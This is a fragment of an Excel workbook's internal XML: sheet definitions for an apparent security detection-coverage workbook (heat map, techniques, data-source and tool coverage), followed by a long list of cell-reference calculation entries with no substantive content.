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msaltzman\Documents\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="10_ncr:100000_{DCC6AA3E-2C89-4FF7-9F92-849CC9A7AB0B}" xr6:coauthVersionLast="31" xr6:coauthVersionMax="40" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="458" windowWidth="13665" windowHeight="8423" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="HeatMap" sheetId="1" r:id="rId1"/>
    <sheet name="Score Defs" sheetId="2" r:id="rId2"/>
    <sheet name="Trends" sheetId="3" r:id="rId3"/>
    <sheet name="Detailed Techniques" sheetId="4" r:id="rId4"/>
    <sheet name="DataQuality-Scores" sheetId="5" r:id="rId5"/>
    <sheet name="Team-Scores" sheetId="9" r:id="rId6"/>
    <sheet name="DataSource-Tool-Coverage" sheetId="6" r:id="rId7"/>
    <sheet name="DS-Tool-Coverage-Histogram" sheetId="7" r:id="rId8"/>
    <sheet name="DS-Tool-Tactic-Coverage" sheetId="8" r:id="rId9"/>
    <sheet name="Security_Tools" sheetId="10" r:id="rId10"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Detailed Techniques'!$A$1:$Y$170</definedName>
    <definedName name="Z_06890A0B_BA60_4C45_92A5_6A3F65A6AC54_.wvu.Cols" localSheetId="3" hidden="1">'Detailed Techniques'!$D:$E,'Detailed Techniques'!$L:$Y</definedName>
    <definedName name="Z_06890A0B_BA60_4C45_92A5_6A3F65A6AC54_.wvu.Cols" localSheetId="0" hidden="1">HeatMap!$B:$B,HeatMap!$D:$D,HeatMap!$F:$F,HeatMap!$H:$H,HeatMap!$J:$J,HeatMap!$L:$L,HeatMap!$N:$N,HeatMap!$P:$P,HeatMap!$R:$R,HeatMap!$T:$T</definedName>
    <definedName name="Z_06890A0B_BA60_4C45_92A5_6A3F65A6AC54_.wvu.FilterData" localSheetId="3" hidden="1">'Detailed Techniques'!$A$1:$Y$170</definedName>
  </definedNames>
  <calcPr calcId="179017"/>
  <customWorkbookViews>
    <customWorkbookView name="Matthew Saltzman - Personal View" guid="{06890A0B-BA60-4C45-92A5-6A3F65A6AC54}" mergeInterval="0" personalView="1" xWindow="1043" yWindow="-921" windowWidth="1200" windowHeight="740" activeSheetId="9"/>
  </customWorkbookViews>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3" i="5" l="1"/>
  <c r="B3" i="5" s="1"/>
  <c r="L5" i="4"/>
  <c r="L14" i="4"/>
  <c r="L16" i="4"/>
  <c r="L20" i="4"/>
  <c r="L2" i="4"/>
  <c r="L3" i="4"/>
  <c r="L4" i="4"/>
  <c r="L6" i="4"/>
  <c r="L7" i="4"/>
  <c r="L8" i="4"/>
  <c r="L9" i="4"/>
  <c r="L10" i="4"/>
  <c r="L11" i="4"/>
  <c r="L12" i="4"/>
  <c r="L13" i="4"/>
  <c r="L15" i="4"/>
  <c r="L17" i="4"/>
  <c r="L18" i="4"/>
  <c r="L19"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B11" i="8" s="1"/>
  <c r="L81" i="4"/>
  <c r="L82" i="4"/>
  <c r="L83" i="4"/>
  <c r="L84" i="4"/>
  <c r="L85" i="4"/>
  <c r="L86" i="4"/>
  <c r="L87" i="4"/>
  <c r="L88" i="4"/>
  <c r="M88" i="4" s="1"/>
  <c r="L89" i="4"/>
  <c r="L90" i="4"/>
  <c r="L91" i="4"/>
  <c r="L92" i="4"/>
  <c r="L93" i="4"/>
  <c r="L94" i="4"/>
  <c r="L95" i="4"/>
  <c r="L96" i="4"/>
  <c r="L97" i="4"/>
  <c r="L98" i="4"/>
  <c r="L99" i="4"/>
  <c r="L100" i="4"/>
  <c r="M100" i="4" s="1"/>
  <c r="L101" i="4"/>
  <c r="L102" i="4"/>
  <c r="L103" i="4"/>
  <c r="L104" i="4"/>
  <c r="B3" i="8" s="1"/>
  <c r="I3" i="8" s="1"/>
  <c r="L105" i="4"/>
  <c r="L106" i="4"/>
  <c r="L107" i="4"/>
  <c r="L108" i="4"/>
  <c r="L109" i="4"/>
  <c r="L110" i="4"/>
  <c r="L111" i="4"/>
  <c r="L112" i="4"/>
  <c r="B5" i="8" s="1"/>
  <c r="I5" i="8" s="1"/>
  <c r="L113" i="4"/>
  <c r="L114" i="4"/>
  <c r="L115" i="4"/>
  <c r="L116" i="4"/>
  <c r="M116" i="4" s="1"/>
  <c r="L117" i="4"/>
  <c r="L118" i="4"/>
  <c r="L119" i="4"/>
  <c r="L120" i="4"/>
  <c r="L121" i="4"/>
  <c r="L122" i="4"/>
  <c r="L123" i="4"/>
  <c r="L124" i="4"/>
  <c r="M124" i="4" s="1"/>
  <c r="L125" i="4"/>
  <c r="L126" i="4"/>
  <c r="L127" i="4"/>
  <c r="L128" i="4"/>
  <c r="B8" i="8" s="1"/>
  <c r="L129" i="4"/>
  <c r="L130" i="4"/>
  <c r="L131" i="4"/>
  <c r="L132" i="4"/>
  <c r="L133" i="4"/>
  <c r="L134" i="4"/>
  <c r="L135" i="4"/>
  <c r="L136" i="4"/>
  <c r="L137" i="4"/>
  <c r="L138" i="4"/>
  <c r="L139" i="4"/>
  <c r="L140" i="4"/>
  <c r="M140" i="4" s="1"/>
  <c r="L141" i="4"/>
  <c r="M141" i="4" s="1"/>
  <c r="L142" i="4"/>
  <c r="L143" i="4"/>
  <c r="L144" i="4"/>
  <c r="B4" i="8" s="1"/>
  <c r="I4" i="8" s="1"/>
  <c r="L145" i="4"/>
  <c r="L146" i="4"/>
  <c r="L147" i="4"/>
  <c r="L148" i="4"/>
  <c r="M148" i="4" s="1"/>
  <c r="L149" i="4"/>
  <c r="M149" i="4" s="1"/>
  <c r="L150" i="4"/>
  <c r="L151" i="4"/>
  <c r="L152" i="4"/>
  <c r="M152" i="4" s="1"/>
  <c r="L153" i="4"/>
  <c r="L154" i="4"/>
  <c r="L155" i="4"/>
  <c r="L156" i="4"/>
  <c r="B7" i="8" s="1"/>
  <c r="L157" i="4"/>
  <c r="L158" i="4"/>
  <c r="L159" i="4"/>
  <c r="L160" i="4"/>
  <c r="M160" i="4" s="1"/>
  <c r="L161" i="4"/>
  <c r="M161" i="4" s="1"/>
  <c r="L162" i="4"/>
  <c r="L163" i="4"/>
  <c r="L164" i="4"/>
  <c r="M164" i="4" s="1"/>
  <c r="L165" i="4"/>
  <c r="L166" i="4"/>
  <c r="L167" i="4"/>
  <c r="L168" i="4"/>
  <c r="M168" i="4" s="1"/>
  <c r="L169" i="4"/>
  <c r="M169" i="4" s="1"/>
  <c r="L170" i="4"/>
  <c r="M170" i="4" s="1"/>
  <c r="B6" i="8"/>
  <c r="B10" i="8"/>
  <c r="B1" i="8"/>
  <c r="Q1" i="8"/>
  <c r="P1" i="8"/>
  <c r="O1" i="8"/>
  <c r="N1" i="8"/>
  <c r="M1" i="8"/>
  <c r="L1" i="8"/>
  <c r="K1" i="8"/>
  <c r="J1" i="8"/>
  <c r="I1" i="8"/>
  <c r="H1" i="8"/>
  <c r="G1" i="8"/>
  <c r="F1" i="8"/>
  <c r="E1" i="8"/>
  <c r="D1" i="8"/>
  <c r="C1" i="8"/>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F44" i="5"/>
  <c r="B44" i="5" s="1"/>
  <c r="F28" i="5"/>
  <c r="B28" i="5" s="1"/>
  <c r="F12" i="5"/>
  <c r="B12" i="5" s="1"/>
  <c r="F39" i="5"/>
  <c r="B39" i="5" s="1"/>
  <c r="F23" i="5"/>
  <c r="B23" i="5" s="1"/>
  <c r="F7" i="5"/>
  <c r="B7" i="5" s="1"/>
  <c r="F34" i="5"/>
  <c r="B34" i="5" s="1"/>
  <c r="F18" i="5"/>
  <c r="B18" i="5" s="1"/>
  <c r="F49" i="5"/>
  <c r="B49" i="5" s="1"/>
  <c r="F33" i="5"/>
  <c r="B33" i="5" s="1"/>
  <c r="F17" i="5"/>
  <c r="B17" i="5" s="1"/>
  <c r="F4" i="5"/>
  <c r="B4" i="5" s="1"/>
  <c r="B57" i="1"/>
  <c r="B58" i="1"/>
  <c r="B59" i="1"/>
  <c r="B60" i="1"/>
  <c r="B61" i="1"/>
  <c r="D30" i="1"/>
  <c r="D31" i="1"/>
  <c r="D32" i="1"/>
  <c r="D33" i="1"/>
  <c r="D34" i="1"/>
  <c r="D35" i="1"/>
  <c r="D36" i="1"/>
  <c r="D37" i="1"/>
  <c r="D38" i="1"/>
  <c r="D39" i="1"/>
  <c r="D40" i="1"/>
  <c r="D41" i="1"/>
  <c r="D42" i="1"/>
  <c r="D43" i="1"/>
  <c r="D44" i="1"/>
  <c r="D45" i="1"/>
  <c r="D46" i="1"/>
  <c r="D47" i="1"/>
  <c r="D48" i="1"/>
  <c r="D49" i="1"/>
  <c r="D50" i="1"/>
  <c r="D51" i="1"/>
  <c r="D52" i="1"/>
  <c r="D53" i="1"/>
  <c r="D54" i="1"/>
  <c r="F61" i="1"/>
  <c r="F62" i="1"/>
  <c r="F63" i="1"/>
  <c r="H23" i="1"/>
  <c r="H24" i="1"/>
  <c r="H25" i="1"/>
  <c r="H26" i="1"/>
  <c r="H27" i="1"/>
  <c r="H28" i="1"/>
  <c r="H29" i="1"/>
  <c r="H30" i="1"/>
  <c r="H31" i="1"/>
  <c r="H32" i="1"/>
  <c r="H33" i="1"/>
  <c r="H34" i="1"/>
  <c r="J21" i="1"/>
  <c r="J22" i="1"/>
  <c r="J23" i="1"/>
  <c r="J24" i="1"/>
  <c r="J25" i="1"/>
  <c r="J26" i="1"/>
  <c r="J27" i="1"/>
  <c r="J28" i="1"/>
  <c r="J29" i="1"/>
  <c r="J30" i="1"/>
  <c r="J31" i="1"/>
  <c r="J32" i="1"/>
  <c r="J33" i="1"/>
  <c r="J34" i="1"/>
  <c r="L20" i="1"/>
  <c r="L21" i="1"/>
  <c r="L22" i="1"/>
  <c r="L23" i="1"/>
  <c r="L24" i="1"/>
  <c r="L25" i="1"/>
  <c r="L26" i="1"/>
  <c r="L27" i="1"/>
  <c r="L28" i="1"/>
  <c r="L29" i="1"/>
  <c r="L30" i="1"/>
  <c r="L31" i="1"/>
  <c r="L32" i="1"/>
  <c r="L33" i="1"/>
  <c r="N34" i="1"/>
  <c r="N35" i="1"/>
  <c r="N36" i="1"/>
  <c r="N37" i="1"/>
  <c r="N38" i="1"/>
  <c r="N39" i="1"/>
  <c r="P15" i="1"/>
  <c r="P16" i="1"/>
  <c r="P17" i="1"/>
  <c r="P18" i="1"/>
  <c r="P19" i="1"/>
  <c r="P20" i="1"/>
  <c r="P21" i="1"/>
  <c r="P22" i="1"/>
  <c r="P23" i="1"/>
  <c r="P24" i="1"/>
  <c r="R11" i="1"/>
  <c r="R12" i="1"/>
  <c r="R13" i="1"/>
  <c r="R14" i="1"/>
  <c r="R15" i="1"/>
  <c r="R16" i="1"/>
  <c r="R17" i="1"/>
  <c r="R18" i="1"/>
  <c r="R19" i="1"/>
  <c r="R20" i="1"/>
  <c r="R21" i="1"/>
  <c r="R22" i="1"/>
  <c r="R23" i="1"/>
  <c r="T22" i="1"/>
  <c r="T23" i="1"/>
  <c r="C4" i="6"/>
  <c r="C4" i="9"/>
  <c r="C10" i="6"/>
  <c r="C10" i="9"/>
  <c r="C20" i="6"/>
  <c r="C20" i="9"/>
  <c r="C14" i="6"/>
  <c r="C14" i="9"/>
  <c r="C39" i="6"/>
  <c r="C39" i="9"/>
  <c r="C40" i="6"/>
  <c r="C40" i="9"/>
  <c r="C25" i="6"/>
  <c r="C25" i="9"/>
  <c r="C41" i="6"/>
  <c r="C41" i="9"/>
  <c r="C8" i="6"/>
  <c r="C8" i="9"/>
  <c r="C3" i="6"/>
  <c r="C5" i="6"/>
  <c r="C6" i="6"/>
  <c r="C7" i="6"/>
  <c r="C9" i="6"/>
  <c r="C11" i="6"/>
  <c r="C12" i="6"/>
  <c r="C13" i="6"/>
  <c r="C15" i="6"/>
  <c r="C16" i="6"/>
  <c r="C17" i="6"/>
  <c r="C2" i="6"/>
  <c r="C18" i="6"/>
  <c r="C19" i="6"/>
  <c r="C21" i="6"/>
  <c r="C22" i="6"/>
  <c r="C23" i="6"/>
  <c r="C24" i="6"/>
  <c r="C26" i="6"/>
  <c r="C27" i="6"/>
  <c r="C28" i="6"/>
  <c r="C29" i="6"/>
  <c r="C30" i="6"/>
  <c r="C31" i="6"/>
  <c r="C32" i="6"/>
  <c r="C33" i="6"/>
  <c r="C34" i="6"/>
  <c r="C35" i="6"/>
  <c r="C36" i="6"/>
  <c r="C37" i="6"/>
  <c r="C38" i="6"/>
  <c r="C42" i="6"/>
  <c r="C43" i="6"/>
  <c r="C44" i="6"/>
  <c r="C45" i="6"/>
  <c r="C46" i="6"/>
  <c r="C47" i="6"/>
  <c r="C48" i="6"/>
  <c r="J174" i="4"/>
  <c r="C2" i="9"/>
  <c r="C3" i="9"/>
  <c r="C5" i="9"/>
  <c r="C6" i="9"/>
  <c r="C7" i="9"/>
  <c r="C9" i="9"/>
  <c r="C11" i="9"/>
  <c r="C12" i="9"/>
  <c r="C13" i="9"/>
  <c r="C15" i="9"/>
  <c r="C16" i="9"/>
  <c r="C17" i="9"/>
  <c r="C18" i="9"/>
  <c r="C19" i="9"/>
  <c r="C21" i="9"/>
  <c r="C22" i="9"/>
  <c r="C23" i="9"/>
  <c r="C24" i="9"/>
  <c r="C26" i="9"/>
  <c r="C27" i="9"/>
  <c r="C28" i="9"/>
  <c r="C29" i="9"/>
  <c r="C30" i="9"/>
  <c r="C31" i="9"/>
  <c r="C32" i="9"/>
  <c r="C33" i="9"/>
  <c r="C34" i="9"/>
  <c r="C35" i="9"/>
  <c r="C36" i="9"/>
  <c r="C37" i="9"/>
  <c r="C38" i="9"/>
  <c r="C42" i="9"/>
  <c r="C43" i="9"/>
  <c r="C44" i="9"/>
  <c r="C45" i="9"/>
  <c r="C46" i="9"/>
  <c r="C47" i="9"/>
  <c r="C48" i="9"/>
  <c r="M3" i="4"/>
  <c r="M20" i="4"/>
  <c r="M11" i="4"/>
  <c r="M17" i="4"/>
  <c r="M22" i="4"/>
  <c r="M30" i="4"/>
  <c r="M34" i="4"/>
  <c r="M38" i="4"/>
  <c r="M42" i="4"/>
  <c r="M46" i="4"/>
  <c r="M50" i="4"/>
  <c r="M54" i="4"/>
  <c r="M58" i="4"/>
  <c r="M62" i="4"/>
  <c r="M68" i="4"/>
  <c r="M72" i="4"/>
  <c r="M78" i="4"/>
  <c r="M82" i="4"/>
  <c r="M86" i="4"/>
  <c r="M90" i="4"/>
  <c r="M94" i="4"/>
  <c r="M96" i="4"/>
  <c r="M98" i="4"/>
  <c r="M102" i="4"/>
  <c r="M104" i="4"/>
  <c r="M106" i="4"/>
  <c r="M110" i="4"/>
  <c r="M112" i="4"/>
  <c r="M114" i="4"/>
  <c r="M118" i="4"/>
  <c r="M120" i="4"/>
  <c r="M122" i="4"/>
  <c r="M126" i="4"/>
  <c r="M130" i="4"/>
  <c r="M132" i="4"/>
  <c r="M133" i="4"/>
  <c r="M134" i="4"/>
  <c r="M138" i="4"/>
  <c r="M142" i="4"/>
  <c r="M145" i="4"/>
  <c r="M146" i="4"/>
  <c r="M150" i="4"/>
  <c r="M153" i="4"/>
  <c r="M154" i="4"/>
  <c r="M157" i="4"/>
  <c r="M158" i="4"/>
  <c r="M167" i="4"/>
  <c r="X14" i="4"/>
  <c r="X16" i="4"/>
  <c r="X35" i="4"/>
  <c r="X39" i="4"/>
  <c r="X2" i="4"/>
  <c r="X3" i="4"/>
  <c r="X4" i="4"/>
  <c r="X5" i="4"/>
  <c r="X6" i="4"/>
  <c r="X7" i="4"/>
  <c r="X8" i="4"/>
  <c r="X9" i="4"/>
  <c r="X10" i="4"/>
  <c r="X11" i="4"/>
  <c r="X12" i="4"/>
  <c r="X13" i="4"/>
  <c r="X15" i="4"/>
  <c r="X17" i="4"/>
  <c r="X18" i="4"/>
  <c r="X19" i="4"/>
  <c r="X20" i="4"/>
  <c r="X21" i="4"/>
  <c r="X22" i="4"/>
  <c r="X23" i="4"/>
  <c r="X24" i="4"/>
  <c r="X25" i="4"/>
  <c r="X26" i="4"/>
  <c r="X27" i="4"/>
  <c r="X28" i="4"/>
  <c r="X29" i="4"/>
  <c r="X30" i="4"/>
  <c r="X31" i="4"/>
  <c r="X32" i="4"/>
  <c r="X33" i="4"/>
  <c r="X34" i="4"/>
  <c r="X36" i="4"/>
  <c r="X37" i="4"/>
  <c r="X38"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X87" i="4"/>
  <c r="X88" i="4"/>
  <c r="X89" i="4"/>
  <c r="X90" i="4"/>
  <c r="X91" i="4"/>
  <c r="X92" i="4"/>
  <c r="X93" i="4"/>
  <c r="X94" i="4"/>
  <c r="X95" i="4"/>
  <c r="X96" i="4"/>
  <c r="X97" i="4"/>
  <c r="X98" i="4"/>
  <c r="X99" i="4"/>
  <c r="X100" i="4"/>
  <c r="X101" i="4"/>
  <c r="X102" i="4"/>
  <c r="X103" i="4"/>
  <c r="X104" i="4"/>
  <c r="X105" i="4"/>
  <c r="X106" i="4"/>
  <c r="X107" i="4"/>
  <c r="X108" i="4"/>
  <c r="X109" i="4"/>
  <c r="X110" i="4"/>
  <c r="X111" i="4"/>
  <c r="X112" i="4"/>
  <c r="X113" i="4"/>
  <c r="X114" i="4"/>
  <c r="X115" i="4"/>
  <c r="X116" i="4"/>
  <c r="X117" i="4"/>
  <c r="X118" i="4"/>
  <c r="X119" i="4"/>
  <c r="X120" i="4"/>
  <c r="X121" i="4"/>
  <c r="Y121" i="4"/>
  <c r="X122" i="4"/>
  <c r="X123" i="4"/>
  <c r="X124" i="4"/>
  <c r="Y124" i="4"/>
  <c r="X125" i="4"/>
  <c r="X126" i="4"/>
  <c r="X127" i="4"/>
  <c r="X128" i="4"/>
  <c r="Y128" i="4"/>
  <c r="X129" i="4"/>
  <c r="X130" i="4"/>
  <c r="X131" i="4"/>
  <c r="X132" i="4"/>
  <c r="Y132" i="4"/>
  <c r="X133" i="4"/>
  <c r="X134" i="4"/>
  <c r="X135" i="4"/>
  <c r="X136" i="4"/>
  <c r="Y136" i="4"/>
  <c r="X137" i="4"/>
  <c r="X138" i="4"/>
  <c r="Y138" i="4"/>
  <c r="X139" i="4"/>
  <c r="Y139" i="4"/>
  <c r="X140" i="4"/>
  <c r="Y140" i="4"/>
  <c r="X141" i="4"/>
  <c r="Y141" i="4"/>
  <c r="X142" i="4"/>
  <c r="X143" i="4"/>
  <c r="Y143" i="4"/>
  <c r="X144" i="4"/>
  <c r="Y144" i="4"/>
  <c r="X145" i="4"/>
  <c r="Y145" i="4"/>
  <c r="X146" i="4"/>
  <c r="X147" i="4"/>
  <c r="Y147" i="4"/>
  <c r="X148" i="4"/>
  <c r="Y148" i="4"/>
  <c r="X149" i="4"/>
  <c r="Y149" i="4"/>
  <c r="X150" i="4"/>
  <c r="Y150" i="4"/>
  <c r="X151" i="4"/>
  <c r="Y151" i="4"/>
  <c r="X152" i="4"/>
  <c r="Y152" i="4"/>
  <c r="X153" i="4"/>
  <c r="Y153" i="4"/>
  <c r="X154" i="4"/>
  <c r="X155" i="4"/>
  <c r="Y155" i="4"/>
  <c r="X156" i="4"/>
  <c r="X157" i="4"/>
  <c r="Y157" i="4"/>
  <c r="X158" i="4"/>
  <c r="Y158" i="4"/>
  <c r="X159" i="4"/>
  <c r="Y159" i="4"/>
  <c r="X160" i="4"/>
  <c r="Y160" i="4"/>
  <c r="X161" i="4"/>
  <c r="Y161" i="4"/>
  <c r="X162" i="4"/>
  <c r="Y162" i="4"/>
  <c r="X163" i="4"/>
  <c r="Y163" i="4"/>
  <c r="X164" i="4"/>
  <c r="Y164" i="4"/>
  <c r="X165" i="4"/>
  <c r="Y165" i="4"/>
  <c r="X166" i="4"/>
  <c r="Y166" i="4"/>
  <c r="X167" i="4"/>
  <c r="Y167" i="4"/>
  <c r="X168" i="4"/>
  <c r="Y168" i="4"/>
  <c r="X169" i="4"/>
  <c r="Y169" i="4"/>
  <c r="X170" i="4"/>
  <c r="Y170" i="4"/>
  <c r="V14" i="4"/>
  <c r="V16" i="4"/>
  <c r="V35" i="4"/>
  <c r="W35" i="4"/>
  <c r="V39" i="4"/>
  <c r="V2" i="4"/>
  <c r="V3" i="4"/>
  <c r="V4" i="4"/>
  <c r="V5" i="4"/>
  <c r="V6" i="4"/>
  <c r="V7" i="4"/>
  <c r="V8" i="4"/>
  <c r="V9" i="4"/>
  <c r="V10" i="4"/>
  <c r="V11" i="4"/>
  <c r="V12" i="4"/>
  <c r="V13" i="4"/>
  <c r="V15" i="4"/>
  <c r="W15" i="4"/>
  <c r="V17" i="4"/>
  <c r="W17" i="4"/>
  <c r="V18" i="4"/>
  <c r="V19" i="4"/>
  <c r="V20" i="4"/>
  <c r="V21" i="4"/>
  <c r="W21" i="4"/>
  <c r="V22" i="4"/>
  <c r="W22" i="4"/>
  <c r="V23" i="4"/>
  <c r="V24" i="4"/>
  <c r="V25" i="4"/>
  <c r="W25" i="4"/>
  <c r="V26" i="4"/>
  <c r="W26" i="4"/>
  <c r="V27" i="4"/>
  <c r="V28" i="4"/>
  <c r="V29" i="4"/>
  <c r="W29" i="4"/>
  <c r="V30" i="4"/>
  <c r="W30" i="4"/>
  <c r="V31" i="4"/>
  <c r="V32" i="4"/>
  <c r="V33" i="4"/>
  <c r="W33" i="4"/>
  <c r="V34" i="4"/>
  <c r="W34" i="4"/>
  <c r="V36" i="4"/>
  <c r="V37" i="4"/>
  <c r="V38" i="4"/>
  <c r="W38" i="4"/>
  <c r="V40" i="4"/>
  <c r="W40" i="4"/>
  <c r="V41" i="4"/>
  <c r="V42" i="4"/>
  <c r="V43" i="4"/>
  <c r="W43" i="4"/>
  <c r="V44" i="4"/>
  <c r="V45" i="4"/>
  <c r="V46" i="4"/>
  <c r="V47" i="4"/>
  <c r="W47" i="4"/>
  <c r="V48" i="4"/>
  <c r="W48" i="4"/>
  <c r="V49" i="4"/>
  <c r="V50" i="4"/>
  <c r="V51" i="4"/>
  <c r="W51" i="4"/>
  <c r="V52" i="4"/>
  <c r="W52" i="4"/>
  <c r="V53" i="4"/>
  <c r="V54" i="4"/>
  <c r="V55" i="4"/>
  <c r="W55" i="4"/>
  <c r="V56" i="4"/>
  <c r="W56" i="4"/>
  <c r="V57" i="4"/>
  <c r="V58" i="4"/>
  <c r="V59" i="4"/>
  <c r="W59" i="4"/>
  <c r="V60" i="4"/>
  <c r="W60" i="4"/>
  <c r="V61" i="4"/>
  <c r="W61" i="4"/>
  <c r="V62" i="4"/>
  <c r="V63" i="4"/>
  <c r="W63" i="4"/>
  <c r="V64" i="4"/>
  <c r="W64" i="4"/>
  <c r="V65" i="4"/>
  <c r="V66" i="4"/>
  <c r="V67" i="4"/>
  <c r="W67" i="4"/>
  <c r="V68" i="4"/>
  <c r="W68" i="4"/>
  <c r="V69" i="4"/>
  <c r="W69" i="4"/>
  <c r="V70" i="4"/>
  <c r="V71" i="4"/>
  <c r="W71" i="4"/>
  <c r="V72" i="4"/>
  <c r="W72" i="4"/>
  <c r="V73" i="4"/>
  <c r="V74" i="4"/>
  <c r="V75" i="4"/>
  <c r="V76" i="4"/>
  <c r="W76" i="4"/>
  <c r="V77" i="4"/>
  <c r="W77" i="4"/>
  <c r="V78" i="4"/>
  <c r="V79" i="4"/>
  <c r="W79" i="4"/>
  <c r="V80" i="4"/>
  <c r="W80" i="4"/>
  <c r="V81" i="4"/>
  <c r="V82" i="4"/>
  <c r="V83" i="4"/>
  <c r="W83" i="4"/>
  <c r="V84" i="4"/>
  <c r="W84" i="4"/>
  <c r="V85" i="4"/>
  <c r="W85" i="4"/>
  <c r="V86" i="4"/>
  <c r="V87" i="4"/>
  <c r="W87" i="4"/>
  <c r="V88" i="4"/>
  <c r="W88" i="4"/>
  <c r="V89" i="4"/>
  <c r="V90" i="4"/>
  <c r="V91" i="4"/>
  <c r="W91" i="4"/>
  <c r="V92" i="4"/>
  <c r="W92" i="4"/>
  <c r="V93" i="4"/>
  <c r="W93" i="4"/>
  <c r="V94" i="4"/>
  <c r="V95" i="4"/>
  <c r="W95" i="4"/>
  <c r="V96" i="4"/>
  <c r="V97" i="4"/>
  <c r="W97" i="4"/>
  <c r="V98" i="4"/>
  <c r="V99" i="4"/>
  <c r="W99" i="4"/>
  <c r="V100" i="4"/>
  <c r="W100" i="4"/>
  <c r="V101" i="4"/>
  <c r="W101" i="4"/>
  <c r="V102" i="4"/>
  <c r="V103" i="4"/>
  <c r="W103" i="4"/>
  <c r="V104" i="4"/>
  <c r="W104" i="4"/>
  <c r="V105" i="4"/>
  <c r="W105" i="4"/>
  <c r="V106" i="4"/>
  <c r="V107" i="4"/>
  <c r="W107" i="4"/>
  <c r="V108" i="4"/>
  <c r="W108" i="4"/>
  <c r="V109" i="4"/>
  <c r="W109" i="4"/>
  <c r="V110" i="4"/>
  <c r="V111" i="4"/>
  <c r="W111" i="4"/>
  <c r="V112" i="4"/>
  <c r="W112" i="4"/>
  <c r="V113" i="4"/>
  <c r="W113" i="4"/>
  <c r="V114" i="4"/>
  <c r="V115" i="4"/>
  <c r="W115" i="4"/>
  <c r="V116" i="4"/>
  <c r="W116" i="4"/>
  <c r="V117" i="4"/>
  <c r="W117" i="4"/>
  <c r="V118" i="4"/>
  <c r="V119" i="4"/>
  <c r="W119" i="4"/>
  <c r="V120" i="4"/>
  <c r="W120" i="4"/>
  <c r="V121" i="4"/>
  <c r="W121" i="4"/>
  <c r="V122" i="4"/>
  <c r="V123" i="4"/>
  <c r="W123" i="4"/>
  <c r="V124" i="4"/>
  <c r="W124" i="4"/>
  <c r="V125" i="4"/>
  <c r="W125" i="4"/>
  <c r="V126" i="4"/>
  <c r="V127" i="4"/>
  <c r="W127" i="4"/>
  <c r="V128" i="4"/>
  <c r="W128" i="4"/>
  <c r="V129" i="4"/>
  <c r="W129" i="4"/>
  <c r="V130" i="4"/>
  <c r="V131" i="4"/>
  <c r="W131" i="4"/>
  <c r="V132" i="4"/>
  <c r="W132" i="4"/>
  <c r="V133" i="4"/>
  <c r="W133" i="4"/>
  <c r="V134" i="4"/>
  <c r="V135" i="4"/>
  <c r="W135" i="4"/>
  <c r="V136" i="4"/>
  <c r="W136" i="4"/>
  <c r="V137" i="4"/>
  <c r="W137" i="4"/>
  <c r="V138" i="4"/>
  <c r="V139" i="4"/>
  <c r="W139" i="4"/>
  <c r="V140" i="4"/>
  <c r="W140" i="4"/>
  <c r="V141" i="4"/>
  <c r="V142" i="4"/>
  <c r="V143" i="4"/>
  <c r="W143" i="4"/>
  <c r="V144" i="4"/>
  <c r="W144" i="4"/>
  <c r="V145" i="4"/>
  <c r="W145" i="4"/>
  <c r="V146" i="4"/>
  <c r="V147" i="4"/>
  <c r="W147" i="4"/>
  <c r="V148" i="4"/>
  <c r="W148" i="4"/>
  <c r="V149" i="4"/>
  <c r="V150" i="4"/>
  <c r="V151" i="4"/>
  <c r="W151" i="4"/>
  <c r="V152" i="4"/>
  <c r="W152" i="4"/>
  <c r="V153" i="4"/>
  <c r="W153" i="4"/>
  <c r="V154" i="4"/>
  <c r="V155" i="4"/>
  <c r="W155" i="4"/>
  <c r="V156" i="4"/>
  <c r="W156" i="4"/>
  <c r="V157" i="4"/>
  <c r="V158" i="4"/>
  <c r="V159" i="4"/>
  <c r="W159" i="4"/>
  <c r="V160" i="4"/>
  <c r="W160" i="4"/>
  <c r="V161" i="4"/>
  <c r="W161" i="4"/>
  <c r="V162" i="4"/>
  <c r="V163" i="4"/>
  <c r="W163" i="4"/>
  <c r="V164" i="4"/>
  <c r="W164" i="4"/>
  <c r="V165" i="4"/>
  <c r="W165" i="4"/>
  <c r="V166" i="4"/>
  <c r="W166" i="4"/>
  <c r="V167" i="4"/>
  <c r="W167" i="4"/>
  <c r="V168" i="4"/>
  <c r="W168" i="4"/>
  <c r="V169" i="4"/>
  <c r="W169" i="4"/>
  <c r="V170" i="4"/>
  <c r="W170" i="4"/>
  <c r="T14" i="4"/>
  <c r="T16" i="4"/>
  <c r="T35" i="4"/>
  <c r="U35" i="4"/>
  <c r="T39" i="4"/>
  <c r="T2" i="4"/>
  <c r="T3" i="4"/>
  <c r="T4" i="4"/>
  <c r="U4" i="4"/>
  <c r="T5" i="4"/>
  <c r="T6" i="4"/>
  <c r="T7" i="4"/>
  <c r="T8" i="4"/>
  <c r="U8" i="4"/>
  <c r="T9" i="4"/>
  <c r="T10" i="4"/>
  <c r="T11" i="4"/>
  <c r="T12" i="4"/>
  <c r="T13" i="4"/>
  <c r="T15" i="4"/>
  <c r="T17" i="4"/>
  <c r="T18" i="4"/>
  <c r="U18" i="4"/>
  <c r="T19" i="4"/>
  <c r="T20" i="4"/>
  <c r="T21" i="4"/>
  <c r="T22" i="4"/>
  <c r="U22" i="4"/>
  <c r="T23" i="4"/>
  <c r="T24" i="4"/>
  <c r="T25" i="4"/>
  <c r="T26" i="4"/>
  <c r="U26" i="4"/>
  <c r="T27" i="4"/>
  <c r="T28" i="4"/>
  <c r="T29" i="4"/>
  <c r="T30" i="4"/>
  <c r="U30" i="4"/>
  <c r="T31" i="4"/>
  <c r="T32" i="4"/>
  <c r="T33" i="4"/>
  <c r="T34" i="4"/>
  <c r="U34" i="4"/>
  <c r="T36" i="4"/>
  <c r="T37" i="4"/>
  <c r="T38" i="4"/>
  <c r="T40" i="4"/>
  <c r="T41" i="4"/>
  <c r="T42" i="4"/>
  <c r="T43" i="4"/>
  <c r="T44" i="4"/>
  <c r="U44" i="4"/>
  <c r="T45" i="4"/>
  <c r="T46" i="4"/>
  <c r="T47" i="4"/>
  <c r="T48" i="4"/>
  <c r="U48" i="4"/>
  <c r="T49" i="4"/>
  <c r="U49" i="4"/>
  <c r="T50" i="4"/>
  <c r="T51" i="4"/>
  <c r="T52" i="4"/>
